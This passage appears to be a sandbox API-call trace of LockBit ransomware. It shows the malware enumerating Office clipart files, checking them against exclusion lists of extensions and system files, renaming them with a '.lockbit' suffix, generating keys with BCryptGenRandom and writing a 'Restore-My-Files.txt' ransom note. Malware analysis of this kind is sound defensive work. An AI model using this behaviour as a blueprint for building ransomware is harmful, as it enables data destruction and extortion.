lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099176.WMF") returned 1 [0122.574] lstrcmpiW (lpString1="ntldr", lpString2="J0099176.WMF") returned 1 [0122.574] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099176.WMF") returned 1 [0122.574] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099176.WMF") returned -1 [0122.574] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099176.WMF") returned -1 [0122.574] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099176.WMF") returned 1 [0122.574] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099176.WMF") returned -1 [0122.574] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0122.574] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF") returned=".WMF" [0122.574] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0122.574] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0122.574] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0122.575] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0122.576] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0122.576] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF.lockbit") returned 72 [0122.576] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099176.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0122.577] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0122.577] malloc (_Size=0x40068) returned 0x3df0008 [0122.577] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2488) returned 1 [0122.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0122.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0122.578] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0122.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0122.613] malloc (_Size=0xa6) returned 0x77d7a8 [0122.613] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0122.613] free (_Block=0x77d7a8) [0122.613] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099176.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0122.614] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0122.614] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0122.614] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x150a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099177.WMF", cAlternateFileName="")) returned 1 [0122.614] lstrcmpiW (lpString1=".", lpString2="J0099177.WMF") returned -1 [0122.614] lstrcmpiW (lpString1="..", lpString2="J0099177.WMF") returned -1 [0122.614] PathFindExtensionW (pszPath="J0099177.WMF") returned=".WMF" [0122.614] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0122.614] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0122.614] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0122.614] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0122.614] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0122.614] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0122.614] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0122.614] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0122.614] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0122.614] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0122.614] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0122.614] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0122.615] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0122.615] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0122.616] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099177.WMF") returned 1 [0122.616] lstrcmpiW (lpString1="ntldr", lpString2="J0099177.WMF") returned 1 [0122.616] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099177.WMF") returned 1 [0122.616] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099177.WMF") returned -1 [0122.616] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099177.WMF") returned -1 [0122.616] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099177.WMF") returned 1 [0122.617] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099177.WMF") returned -1 [0122.617] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0122.617] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF") returned=".WMF" [0122.617] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0122.617] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0122.617] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0122.618] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0122.618] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF.lockbit") returned 72 [0122.618] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099177.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0122.619] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0122.619] malloc (_Size=0x40068) returned 0x3df0008 [0122.619] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5386) returned 1 [0122.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.620] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0122.620] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0122.621] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0122.713] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0122.713] malloc (_Size=0xa6) returned 0x77d7a8 [0122.713] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0122.772] free (_Block=0x77d7a8) [0122.772] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099177.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0122.772] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0122.773] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0122.773] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0xe16, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099178.WMF", cAlternateFileName="")) returned 1 [0122.773] lstrcmpiW (lpString1=".", lpString2="J0099178.WMF") returned -1 [0122.773] lstrcmpiW (lpString1="..", lpString2="J0099178.WMF") returned -1 [0122.773] PathFindExtensionW (pszPath="J0099178.WMF") returned=".WMF" [0122.773] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0122.773] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0122.774] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0122.774] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0122.775] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0122.775] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0122.775] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0122.775] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0122.775] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0122.775] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0122.775] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0122.775] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099178.WMF") returned 1 [0122.775] lstrcmpiW (lpString1="ntldr", lpString2="J0099178.WMF") returned 1 [0122.775] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099178.WMF") returned 1 [0122.775] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099178.WMF") returned -1 [0122.775] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099178.WMF") returned -1 [0122.775] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099178.WMF") returned 1 [0122.775] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099178.WMF") returned -1 [0122.775] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0122.775] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF") returned=".WMF" [0122.775] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0122.775] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0122.775] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0122.775] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0122.775] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0122.775] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0122.776] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0122.777] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF.lockbit") returned 72 [0122.777] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099178.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0122.778] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0122.778] malloc (_Size=0x40068) returned 0x3df0008 [0122.778] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3606) returned 1 [0122.779] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.779] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0122.779] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0122.780] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0122.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0122.780] ReadFile (in: hFile=0x2f4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0122.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0122.894] malloc (_Size=0xa6) returned 0x77d7a8 [0122.894] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0122.895] free (_Block=0x77d7a8) [0122.895] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099178.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0122.895] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0122.895] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0122.895] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, 